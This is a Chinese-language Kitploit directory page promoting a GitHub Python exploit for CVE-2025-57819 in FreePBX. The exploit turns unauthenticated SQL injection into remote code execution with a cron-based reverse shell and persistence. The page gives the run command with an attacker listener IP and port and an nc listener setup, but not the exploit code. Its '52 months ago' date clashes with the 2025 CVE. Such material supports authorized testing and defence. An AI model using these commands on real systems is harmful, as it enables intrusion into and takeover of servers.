Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-57819-exploit — 针对 FreePBX 的 CVE-2025-57819 Python 利用程序,通过未认证的 SQL 注入实现远程代码执行,并自动建立反向 Shell 和基于 cron 的持久化。 | Kitploit
工具/GitHubGitHub/its1zero/cve-2025-57819-exploit
持久化机制漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubits1zero/cve-2025-57819-exploit

cve-2025-57819-exploit

针对 FreePBX 的 CVE-2025-57819 Python 利用程序,通过未认证的 SQL 注入实现远程代码执行,并自动建立反向 Shell 和基于 cron 的持久化。

查看仓库
52个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-57819 漏洞利用工具

元数据

  • 严重性: 严重 (9.8)
  • 向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • 类型: 未认证 SQL注入 → 远程代码执行
  • 受影响的软件: FreePBX (endpoint 模块) < 15.0.66、< 16.0.89 及 < 17.0.3
  • 测试环境: FreePBX 16.0.40.7 在 CentOS 7 + Apache 2.4 上

概述

本脚本利用存在漏洞的 FreePBX 端点模块中的 CVE-2025-57819。该漏洞允许 SQL 注入,进而被用于注入恶意定时任务。

与其他公开漏洞不同,无需通过上传的 WebShell 与目标交互等额外步骤。这是一种直接的方法,可直接为您提供反向 Shell 访问。

影响

通过 SQL 注入和定时任务操纵实现远程代码执行。成功利用将在目标系统上获得一个反向 Shell。根据配置,这可能导致完全系统沦陷。

功能特点

  • 通过存在漏洞的 AJAX 端点实现 SQL 注入
  • 自动生成反向 Shell 有效载荷
  • 通过每分钟执行一次 (* * * * *) 的定时任务实现持久化
  • 自动清理注入的定时任务
  • 使用十六进制编码的有效载荷,因为 base64 有效载荷在遇到 + 字符被解释为空格时会损坏。

使用方法

通过提供目标和监听器配置来运行漏洞:

root@kitploit:~
python3 cve-2025-57819.py <target> <lhost> <lport>

参数

  • <target>: 目标主机名或 IP 地址(存在漏洞的 FreePBX 实例)
  • <lhost>: 攻击者用于接收反向 Shell 回调的 IP 地址
  • <lport>: 监听传入连接的端口

示例:

root@kitploit:~
python3 cve-2025-57819.py freepbx.local 10.10.16.38 9999

监听器设置

在执行漏洞之前启动一个监听器:

root@kitploit:~
nc -lvnp <port>

示例:

root@kitploit:~
nc -nlvp 9999

免责声明

本工具仅用于教育目的和授权的安全测试。未经明确许可在系统上未经授权使用是违法的。作者对因使用本工具造成的误用或损害不承担任何责任。

作者

Its1Zero - [email protected]

参考来源

  • https://nvd.nist.gov/vuln/detail/cve-2025-57819
  • https://github.com/freepbx/security-reporting/security/advisories/ghsa-m42g-xg4c-5f3h
  • https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819
下载工具